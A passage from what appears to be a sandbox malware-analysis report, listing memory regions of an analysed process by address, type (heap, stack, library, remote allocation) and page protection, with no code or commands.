|
page read and write
|
||
761E000
|
stack
|
page read and write
|
||
7B30000
|
trusted library allocation
|
page read and write
|
||
5FC2000
|
heap
|
page read and write
|
||
93EC000
|
stack
|
page read and write
|
||
65F9000
|
heap
|
page read and write
|
||
548E000
|
heap
|
page read and write
|
||
5066000
|
heap
|
page read and write
|
||
2D0B000
|
heap
|
page read and write
|
||
8880000
|
trusted library allocation
|
page execute and read and write
|
||
AFC000
|
stack
|
page read and write
|
||
501D000
|
heap
|
page read and write
|
||
507C000
|
heap
|
page read and write
|
||
7C80000
|
trusted library allocation
|
page execute and read and write
|
||
5131000
|
trusted library allocation
|
page read and write
|
||
4C90000
|
trusted library allocation
|
page read and write
|
||
65DF000
|
heap
|
page read and write
|
||
5460000
|
heap
|
page read and write
|
||
65C0000
|
heap
|
page read and write
|
||
6035000
|
trusted library allocation
|
page read and write
|
||
2E7E000
|
stack
|
page read and write
|
||
4ADE000
|
stack
|
page read and write
|
||
5145000
|
trusted library allocation
|
page read and write
|
||
77D0000
|
trusted library allocation
|
page read and write
|
||
86AE000
|
stack
|
page read and write
|
||
E0C000
|
stack
|
page read and write
|
||
500F000
|
stack
|
page read and write
|
||
CA5000
|
heap
|
page read and write
|
||
653B000
|
heap
|
page read and write
|
||
65CB000
|
heap
|
page read and write
|
||
593D000
|
trusted library allocation
|
page read and write
|
||
6003000
|
heap
|
page read and write
|
||
7961000
|
heap
|
page read and write
|
||
5FD3000
|
heap
|
page read and write
|
||
65F5000
|
heap
|
page read and write
|
||
600D000
|
heap
|
page read and write
|
||
13E0000
|
heap
|
page read and write
|
||
5FC2000
|
heap
|
page read and write
|
||
6564000
|
heap
|
page read and write
|
||
65C1000
|
heap
|
page read and write
|
||
6599000
|
heap
|
page read and write
|
||
4F8D000
|
stack
|
page read and write
|
||
65B3000
|
heap
|
page read and write
|
||
31A0000
|
heap
|
page read and write
|
||
E58000
|
stack
|
page read and write
|
||
54B5000
|
trusted library allocation
|
page read and write
|
||
65E6000
|
heap
|
page read and write
|
||
8A70000
|
heap
|
page read and write
|
||
5F99000
|
heap
|
page read and write
|
||
2C3A000
|
heap
|
page read and write
|
||
7D20000
|
trusted library allocation
|
page read and write
|
||
65DD000
|
heap
|
page read and write
|
||
50B0000
|
heap
|
page read and write
|
||
2C05000
|
heap
|
page read and write
|
||
2C11000
|
heap
|
page read and write
|
||
2B72000
|
heap
|
page read and write
|
||
600D000
|
heap
|
page read and write
|
||
5488000
|
heap
|
page read and write
|
||
7690000
|
heap
|
page read and write
|
||
5FC2000
|
heap
|
page read and write
|
||
50D9000
|
heap
|
page read and write
|
||
653D000
|
heap
|
page read and write
|
||
732F000
|
stack
|
page read and write
|
||
54DE000
|
heap
|
page read and write
|
||
8B6F000
|
heap
|
page read and write
|
||
64BA000
|
trusted library allocation
|
page read and write
|
||
65F3000
|
heap
|
page read and write
|
||
3590000
|
heap
|
page read and write
|
||
7D3E000
|
stack
|
page read and write
|
||
7120000
|
trusted library allocation
|
page read and write
|
||
7126000
|
direct allocation
|
page read and write
|
||
2BB5000
|
heap
|
page read and write
|
||
600D000
|
heap
|
page read and write
|
||
65C4000
|
heap
|
page read and write
|
||
7CC0000
|
trusted library allocation
|
page read and write
|
||
7D10000
|
trusted library allocation
|
page read and write
|
||
3647000
|
heap
|
page read and write
|
||
2CEE000
|
stack
|
page read and write
|
||
2D0C000
|
heap
|
page read and write
|
||
65FF000
|
heap
|
page read and write
|
||
782D000
|
stack
|
page read and write
|
||
6001000
|
heap
|
page read and write
|
||
2D09000
|
heap
|
page read and write
|
||
50DB000
|
heap
|
page read and write
|
||
65CB000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
2B9B000
|
heap
|
page read and write
|
||
2D40000
|
heap
|
page read and write
|
||
4CB0000
|
trusted library allocation
|
page read and write
|
||
65DF000
|
heap
|
page read and write
|
||
8870000
|
heap
|
page read and write
|
||
505F000
|
stack
|
page read and write
|
||
BBC000
|
stack
|
page read and write
|
||
64CB000
|
heap
|
page read and write
|
||
33A8000
|
trusted library allocation
|
page read and write
|
||
5F21000
|
trusted library allocation
|
page read and write
|
||
7AF0000
|
heap
|
page read and write
|
||
65F9000
|
heap
|
page read and write
|
||
7D50000
|
trusted library allocation
|
page read and write
|
||
761F000
|
stack
|
page read and write
|
||
7951000
|
heap
|
page read and write
|
||
54E3000
|
heap
|
page read and write
|
||
5107000
|
heap
|
page read and write
|
||
600D000
|
heap
|
page read and write
|
||
3183000
|
trusted library allocation
|
page execute and read and write
|
||
2B80000
|
heap
|
page read and write
|
||
77EA000
|
trusted library allocation
|
page read and write
|
||
50DD000
|
heap
|
page read and write
|
||
53FA000
|
stack
|
page read and write
|
||
5B00000
|
heap
|
page read and write
|
||
54B8000
|
heap
|
page read and write
|
||
2D41000
|
heap
|
page read and write
|
||
4C50000
|
trusted library allocation
|
page read and write
|
||
54C3000
|
heap
|
page read and write
|
||
5FE2000
|
heap
|
page read and write
|
||
65C4000
|
heap
|
page read and write
|
||
64C9000
|
heap
|
page read and write
|
||
2C34000
|
heap
|
page read and write
|
||
5F87000
|
heap
|
page read and write
|
||
6533000
|
heap
|
page read and write
|
||
F00000
|
heap
|
page read and write
|
||
54DD000
|
stack
|
page read and write
|
||
318D000
|
trusted library allocation
|
page execute and read and write
|
||
351A000
|
trusted library allocation
|
page execute and read and write
|
||
5F32000
|
heap
|
page read and write
|
||
5498000
|
trusted library allocation
|
page read and write
|
||
505B000
|
heap
|
page read and write
|
||
755D000
|
stack
|
page read and write
|
||
501B000
|
heap
|
page read and write
|
||
2E1D000
|
heap
|
page read and write
|
||
65D8000
|
heap
|
page read and write
|
||
7CFE000
|
stack
|
page read and write
|
||
5481000
|
heap
|
page read and write
|
||
5F32000
|
heap
|
page read and write
|
||
31E0000
|
heap
|
page read and write
|
||
53B7000
|
trusted library allocation
|
page read and write
|
||
64F5000
|
heap
|
page read and write
|
||
8B25000
|
heap
|
page read and write
|
||
60C9000
|
trusted library allocation
|
page read and write
|
||
2DF9000
|
heap
|
page read and write
|
||
595F000
|
stack
|
page read and write
|
||
65EA000
|
heap
|
page read and write
|
||
8A30000
|
trusted library section
|
page read and write
|
||
784E000
|
stack
|
page read and write
|
||
6430000
|
trusted library allocation
|
page read and write
|
||
33CA000
|
heap
|
page read and write
|
||
305E000
|
stack
|
page read and write
|
||
720A000
|
stack
|
page read and write
|
||
75FB000
|
heap
|
page read and write
|
||
54BF000
|
heap
|
page read and write
|
||
5069000
|
heap
|
page read and write
|
||
2B7E000
|
heap
|
page read and write
|
||
51FD000
|
heap
|
page read and write
|
||
620F000
|
stack
|
page read and write
|
||
65B3000
|
heap
|
page read and write
|
||
8E6E000
|
stack
|
page read and write
|
||
7710000
|
heap
|
page read and write
|
||
4FCE000
|
stack
|
page read and write
|
||
2BC3000
|
heap
|
page read and write
|
||
65EA000
|
heap
|
page read and write
|
||
7C0C000
|
heap
|
page read and write
|
||
6004000
|
heap
|
page read and write
|
||
65DD000
|
heap
|
page read and write
|
||
6001000
|
heap
|
page read and write
|
||
4750000
|
heap
|
page read and write
|
||
6D95000
|
trusted library allocation
|
page read and write
|
||
8510000
|
trusted library allocation
|
page read and write
|
||
64A1000
|
heap
|
page read and write
|
||
EC0000
|
heap
|
page read and write
|
||
65D8000
|
heap
|
page read and write
|
||
54C4000
|
heap
|
page read and write
|
||
5470000
|
heap
|
page read and write
|
||
2BB9000
|
heap
|
page read and write
|
||
7F3E0000
|
trusted library allocation
|
page execute and read and write
|
||
897B000
|
trusted library allocation
|
page read and write
|
||
4C79000
|
trusted library allocation
|
page read and write
|
||
7910000
|
heap
|
page read and write
|
||
478000
|
remote allocation
|
page execute and read and write
|
||
5874000
|
trusted library allocation
|
page read and write
|
||
7975000
|
heap
|
page read and write
|
||
4C95000
|
trusted library allocation
|
page execute and read and write
|
||
2B86000
|
heap
|
page read and write
|
||
8950000
|
heap
|
page read and write
|
||
6757000
|
trusted library allocation
|
page read and write
|
||
76DE000
|
stack
|
page read and write
|
||
8B5E000
|
heap
|
page read and write
|
||
75A0000
|
trusted library allocation
|
page read and write
|
||
8A80000
|
heap
|
page read and write
|
||
65F9000
|
heap
|
page read and write
|
||
2B5E000
|
heap
|
page read and write
|
||
4D50000
|
heap
|
page read and write
|
||
7990000
|
trusted library allocation
|
page read and write
|
||
5F93000
|
heap
|
page read and write
|
||
7BAE000
|
stack
|
page read and write
|
||
2AFB000
|
stack
|
page read and write
|
||
7DD0000
|
trusted library allocation
|
page read and write
|
||
65D0000
|
heap
|
page read and write
|
||
6584000
|
heap
|
page read and write
|
||
6531000
|
heap
|
page read and write
|
||
2E0B000
|
heap
|
page read and write
|
||
65F9000
|
heap
|
page read and write
|
||
51FA000
|
trusted library allocation
|
page read and write
|
||
EB0000
|
heap
|
page read and write
|
||
DAF000
|
stack
|
page read and write
|
There are 1113 hidden memdumps, click here to show them.